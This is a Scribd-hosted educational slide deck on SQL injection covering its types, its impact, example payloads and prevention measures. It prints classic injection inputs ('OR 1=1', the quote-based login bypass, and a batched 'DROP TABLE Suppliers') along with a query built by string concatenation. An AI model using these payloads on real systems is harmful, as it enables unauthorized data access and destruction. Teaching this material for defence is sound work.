Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd
Upload
21 views

SQL Injection

Uploaded by

Ammar Mousa
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
21 views

SQL Injection

Uploaded by

Ammar Mousa
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 16

SQL Injection

What is SQL Injection ?

 SQL injection is a code injection technique that might destroy your

database.

 SQL injection is one of the most common web hacking techniques.

 SQL injection is the placement of malicious code in SQL statements, via

web page input.


How SQL Injection works?
Impact of SQL Injection

 There are a number of things an attacker can do when exploiting an SQL


injection on a vulnerable website. Usually, it depends on the privileges of
the user the web application uses to connect to the database server. By
exploiting an SQL injection vulnerability, an attacker can:

 Add, delete, edit or read content in the database

 Read source code from files on the database server

 Write files to the database server


Types of SQL Injection

1) In-band SQLi

2) Inferential SQLi

3) Out-of-band SQLi
In-band SQLi

 In-band SQL Injection occurs when an attacker is able to use the same
communication channel to both launch the attack and gather results.

 The two most common types of in-band SQL Injection are Error-based SQLi
and Union-based SQLi.
In-band SQLi

Error-based SQLi :
is an in-band SQL Injection technique that relies on error messages thrown by
the database server to obtain information about the structure of the
database.

Union-based SQLi:
is an in-band SQL injection technique that leverages the UNION SQL operator
to combine the results of two or more SELECT statements into a single result
Inferential SQLi

 In an inferential SQLi attack, no data is actually transferred via the web


application and the attacker would not be able to see the result of an
attack in-band.

 Instead, an attacker is able to reconstruct the database structure by


sending payloads, observing the web application’s response and the
resulting behavior of the database server.
Out-of-band SQLi

 Out-of-band SQL Injection occurs when an attacker is unable to use the


same channel to launch the attack and gather results.

 Out-of-band techniques, offer an attacker an alternative to inferential time-


based techniques, especially if the server responses are not very stable
(making an inferential time-based attack unreliable).

 Out-of-band SQLi techniques would rely on the database server’s ability to


make DNS or HTTP requests to deliver data to an attacker
Examples

SQL Injection Based on 1=1 is Always True


 If there is nothing to prevent a user from entering "wrong" input, the user
can enter some "smart" input like this:
 UserId: 100 or 1=1
 Then, the SQL statement will look like this:
 SELECT * FROM Users WHERE UserId = 105 OR 1=1;
 The SQL above is valid and will return ALL rows from the "Users" table, since
OR 1=1 is always TRUE.
 A hacker might get access to all the user names and passwords in a
database, by simply inserting 105 OR 1=1 into the input field.
Examples

 SQL Injection Based on ""="" is Always True


 SELECT * FROM Users WHERE Name =“Ali Anwar" AND Pass =“account1!"

 A hacker might get access to user names and passwords in a database by simply inserting " OR
""=" into the user name or password text box:

 User Name: " or ""="

 Password: " or ""="

 The code at the server will create a valid SQL statement like this:
 SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
 The SQL above is valid and will return all rows from the "Users" table, since OR ""="" is always TRUE.
Examples
SQL Injection Based on Batched SQL
Statements
 A batch of SQL statements is a group of two or more SQL statements, separated
by semicolons.
 Example:
 SELECT * FROM Users; DROP TABLE Suppliers
 Look at the following example:
 Example
 txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
 And the following input:
 User id: 105; DROP TABLE Suppliers
 The valid SQL statement would look like this:
 SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers;
SQL Injection Prevention

 1. Employ comprehensive data sanitization. Websites must filter all user


input. Ideally, user data should be filtered for context. For example, email
addresses should be filtered to allow only the characters allowed in an e-
mail address, phone numbers should be filtered to allow only the
characters allowed in a phone number, and so on.

 2. Use a web application firewall. A popular example is the free, open


source module ModSecurity which is available for Apache, Microsoft IIS,
and nginx web servers. ModSecurity provides a sophisticated and ever-
evolving set of rules to filter potentially dangerous web requests. Its SQL
injection defenses can catch most attempts to sneak SQL through web
channels.
SQL Injection Prevention

3. Limit database privileges by context.


Create multiple database user accounts with the minimum levels of privilege
for their usage environment. For example, the code behind a login page
should query the database using an account limited only to the relevent
credentials table.

4. Avoid constructing SQL queries with user input.


Even data sanitization routines can be flawed. Ideally, using SQL variable
binding with prepared statements or stored procedures is much safer than
constructing full queries.
SQL Injection Prevention

Regularly apply software patches.


Because SQL injection vulnerabilities are regularly identified in commercial
software, it is important to stay up to date on patching.

6. Continuously monitor SQL statements from database-connected


applications
This will help identify rogue SQL statements and vulnerabilities. Monitoring tools
that utilize machine learning and/or behavioral analysis can be especially
useful..

You might also like